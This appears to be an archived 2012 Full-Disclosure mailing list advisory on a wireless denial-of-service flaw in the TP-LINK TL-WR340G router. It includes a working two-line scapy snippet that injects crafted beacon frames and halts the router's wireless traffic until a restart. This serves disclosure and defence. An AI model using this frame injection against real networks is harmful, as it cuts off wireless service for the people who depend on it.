[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] TP-LINK TL-WR340G Wireless Denial of Service

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] TP-LINK TL-WR340G Wireless Denial of Service
From: "Adam P." <ziherung.pl@xxxxxxxxx>
Date: Tue, 04 Sep 2012 20:14:24 +0200

=== intro ===

TP-LINK TL-WR340G is a SOHO router with integrated IEEE 802.11b/g AP. 
Now it's marked End-of-Life.

Transmitting crafted frames in proximity of working router cause device 
to malfunction. Wireless communication stops,  existing clients don't 
receive frames from AP ( except beacons ), new clients can't connect.


=== details ===

Affected product: TL-WR340G Wireless router
Firm Version:  4.7.11  Build 101102 Rel.60376n
Hardware Version: WR340G v3
Local/remote: Local ( wirelessly )

Vulnerability can be spotted by crafting and transmitting frame with scapy:

 >> fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="<AP 
MAC>",addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt()
 >> sendp(fr,iface="injection capable wireless interface",count=5)

Attacker could cease wireless traffic. To resume AP functionality user 
must restart wireless interface in WebGUI or restart device.


=== time-line ===
2.08.2012 - vendor notified
4.09.2012 - no response from vendor, published

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Splunk Vulnerability
Next by Date: Re: [Full-disclosure] Splunk Vulnerability
Previous by thread: Re: [Full-disclosure] cloudsafe365 for wordpress: file disclosure
Next by thread: [Full-disclosure] [SECURITY] [DSA 2539-1] zabbix security update
Index(es):
- Date
- Thread